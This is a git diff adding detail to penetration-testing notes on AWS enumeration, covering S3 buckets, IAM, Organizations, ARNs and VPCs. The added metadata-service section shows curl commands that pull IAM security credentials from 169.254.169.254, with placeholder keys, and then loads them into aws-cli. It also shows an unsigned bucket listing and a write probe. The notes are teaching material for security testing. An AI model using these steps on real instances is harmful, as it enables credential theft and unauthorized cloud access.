added more details

Enumeration/AWS.md

@@ -33,7 +33,8 @@ or
 http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
 ```
 
-* __List content of public bucket via__
+### List content of public bucket via
+
 ```sh
 aws s3 ls s3://<bucketname>/ --no-sign-request
 ```
@@ -51,9 +52,10 @@ If the ACL is set to
 * `Anyone`, just `curl`
 * `AuthenticatedUsers`, `s3` cli with aws key
 
-## IAM
+## Identity Access Management (IAM)
 
-Permissions are granted directly through user accounts or indirectly through
+Permissions are granted directly through IAM identities (IAM Principals) inside
+an AWS account or indirectly through
 roles the user has joined.
 
 <img src="./include/iam-intro-users-and-groups.diagram.png" alt="Policy evaluation" width="auto" height="auto">
@@ -75,7 +77,7 @@ and authorization.
 
 Every AWS account has a single root account bound to an email address. This
 account has got the all privileges over the account. A root account has MFA
-disabled by default.
+disabled by default. Has all permissions except Organizational Service Control Policies.
 
 The account is susceptible to an attack if the mail address is accessible but
 MFA is not activated.
@@ -83,11 +85,13 @@ MFA is not activated.
 If the MFA is not set, it is an opportunity for a password reset attack when
 the account the vulnerable root belongs to is part of an AWS Organization.
 
-### User Policies
+### (User) Policies
 
 After authentication of a user (or principal) policies of the account are
 checked if the request is allowed.
 Policy evaluation can be found in the [AWS docs](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic.html).
+A policy may also be attached to a resource.
+
 The following graph is taken from the documentation, it shows the evaluation
 logic inside an account
 
@@ -96,6 +100,27 @@ logic inside an account
 Policies like `assume-role` and `switch-role` can lead to the gain of roles
 with higher permissions
 
+## AWS Organizations
+
+An organization is a tree structure, made out of a single root account and
+Organizational Units (UOs). UOs can have children UOs. AN UO may contain
+multiple AWS accounts. An AWS account can contain multiple user accounts.
+
+An organization has IAM and SSO that also works with external identity
+Providers (idP). This is done through the AWS IAM Identity Center which is used
+to confiure roles and permissions.
+
+Further, there is a management account inside any organization. It owns the
+role "OrganizationAccountAccessRole". This account uses the policies/roles
+mentioned in the [User Policies](#User-Policies) which are  `assume-role` and
+`switch-role` on the cli tool and the management web-console to gain
+administrative permissions over the UOs inside the organization.
+
+By default the Service Control Policy (SCP) `p-full-access` it attached to
+every account inside the organization. This SCP allows subscription to all AWS
+services. An account can have 5 SCPs at max. Limiting SCPs do not apply to the
+management account itself.
+
 ### User Provisioning
 
 When using the cli command, the aws configuration and credentials are stored at `~/.aws`
@@ -136,9 +161,12 @@ In another region
 aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME
 ```
 
-### AWS ARN
+### Amazon Resource Name (ARN)
 
-Unique ID is create through the following scheme
+The [ARN](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html)
+is a unique ID which identifies resources.
+
+A Unique ID is create through the following scheme
 
 ```sh
 arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
@@ -159,3 +187,72 @@ Do a `PUT` method to see if the bucket may be writeable to upload a file via
 ```sh
 curl -vvv -X PUT $BUCKET_URL  --data "Test of write permissions"
 ```
+
+## Virtual Private Cloud (VPC)
+
+Is a logic network segementation method using its own IP address range.
+Contains resources like VMs (EC2) and has an Internet gateway if needed. The
+gateway can be either just ingress, egress, or both. EC2 can use elastic IP
+addresses to provide Ingress. A Gateway Load Balancer can be used to do traffic inspection.
+
+To connect to a VPC, it does not need to be exposed to the Internet. It is
+accessible through various connection services like Direct Connect or
+PrivateLink.
+
+VPCs can have multiple subnets, they use host infrastructure components like
+DHCP, NTP and DNS provided by AWS.
+
+NTP can be found under 169.254.169.123. The DNS resolver `Route 53` can be
+found under 169.254.169.253. Microsoft's KMS service can be at 169.254.169.250
+and 169.254.169.251.
+
+### Metadata Service
+
+The instance (Openstack) Metadata service can be found under 169.254.169.254.
+It can be used
+to gain information about the EC2 via a GET request to
+http://169.254.169.254/latest/meta-data .
+
+The task metadata service can be found at 169.254.170.2 and is used for the
+Elastic Container Service (ECS).
+
+The instance metadata service has been used for information disclosure of
+security credentials before.
+[Alexander
+Hose](https://alexanderhose.com/how-to-hack-aws-instances-with-the-metadata-service-enabled/)
+describes how to use the credentials through aws-cli.
+
+```sh
+[ec2-user ~] curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
+ec2S3FullAccess
+[ec2-user ~] curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2S3FullAccess
+{
+    "Code": "Success",
+    "LastUpdated": "2022-10-01T15:19:43Z",
+    "Type": "AWS-HMAC",
+    "AccessKeyId": "ASIAMFKOAUSJ7EXAMPLE",
+    "SecretAccessKey": "UeEevJGByhEXAMPLEKEY",
+    "Token": "TQijaZw==",
+    "Expiration": "2022-10-01T21:44:45Z"
+}
+```
+
+Use the credentials to configure aws-cli.
+
+```sh
+$ aws configure
+AWS Access Key ID [None]: ASIAMFKOAUSJ7EXAMPLE
+AWS Secret Access Key [None]: UeEevJGByhEXAMPLEKEYEXAMPLEKEY
+Default region name [None]: us-east-2
+Default output format [None]: json
+```
+
+Add the credentials to the AWS credentials file
+
+```sh
+[default]
+aws_access_key_id = ASIAMFKOAUSJ7EXAMPLE
+aws_secret_access_key = UeEevJGByhEXAMPLEKEYEXAMPLEKEY
+aws_session_token = TQijaZw==
+```
+